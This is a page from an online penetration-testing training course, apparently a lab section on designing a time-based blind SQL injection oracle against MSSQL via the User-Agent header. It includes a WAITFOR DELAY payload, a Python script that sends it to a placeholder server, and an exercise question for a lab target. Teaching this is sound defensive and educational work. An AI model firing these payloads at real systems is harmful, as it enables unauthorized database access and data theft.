Blind SQL Injection
Oracle Design
Theory
In this case, no results or SQL error messages are displayed from the injection in the User-Agent header. All we know is that the query does not run synchronously because the rest of the page waits for it to complete before being returned to us. To extract data in this situation, we can make the server evaluate queries and then wait for different amounts of time based on the outcome, so for example let's imagine we want to know if the query q is true or false. We can set the User-Agent so that a query similar to the following is executed. If q is true, then the server will wait 5 seconds before responding, and if q is false the server will respond immediately.
SELECT ... FROM ... WHERE ... = 'Mozilla Firefox...'; IF (q) WAITFOR DELAY '0:0:5'--'
For example, let's once again test the 1=0 and 1=1 queries. First, testing a False query (e.g. 1=0) does not result in any delay, and we get an instant response, as shown below:
Now, if we test a query that results in True (e.g. 1=1), we do get a delayed response by the the time we specified, as shown below:
We can use the same concept with any SQL query to verify whether it is true or false.
Practice
In Python, we can script this like this. As this injection is time-based, you may have to play around with the value of DELAY. In above case, we used 1 second, but you may need more seconds depending on internet/VPN speeds. When it comes to time-based injections, the longer the delay is, the more accurate your results will be. For example, if you used a delay of 1 second, and the server simply responded slowly on one request, you might think the injection caused the delay rather than the server just being slow. Of course, a longer delay will mean the dumping process takes longer, so this is a trade-off you need to consider.
#!/usr/bin/python3
import requests
import time
# Define the length of time (in seconds) the server should
# wait if `q` is `true`
DELAY = 1
# Evalutes `q` on the server side and returns `true` or `false`
def oracle(q):
start = time.time()
r = requests.get(
"http://SERVER_IP:8080/",
headers={"User-Agent": f"';IF({q}) WAITFOR DELAY '0:0:{DELAY}'--"}
)
return time.time() - start > DELAY
# Verify that the oracle works by checking if the correct
# values are returned for queries `1=1` and `1=0`
assert oracle("1=1")
assert not oracle("1=0")
Question
Use the oracle to figure out what the fifth letter of db_name() is (Hint: it is a lowercase letter). You can use the following query as a base:
(select substring(db_name(), 5, 1)) = 'a'
VPN Servers
Warning: Each time you "Switch", your connection keys are regenerated and you must re-download your VPN connection file.
All VM instances associated with the old VPN Server will be terminated when switching to
a new VPN server.
Existing PwnBox instances will automatically switch to the new VPN server.
PROTOCOL
/ 1 spawns left
Questions
Answer the question(s) below to complete this Section and earn cubes!
Click here to spawn the target system!
Target:
Click here to spawn the target system!
+10 Streak pts
Table of Contents
Introduction
Introduction to MSSQL/SQL Server Introduction to Blind SQL InjectionBoolean-based SQLi
Identifying the Vulnerability Designing the Oracle Extracting Data OptimizingTime-based SQLi
Identifying the Vulnerability Oracle Design Data Extraction Out-of-Band DNSMSSQL-specific Attacks
Remote Code Execution Leaking NetNTLM Hashes File ReadTools of the Trade
Tools of the TradePreventing SQL Injection Vulnerabilities
Defending against SQL InjectionSkills Assessment
Skills AssessmentMy Workstation
OFFLINE
/ 1 spawns left
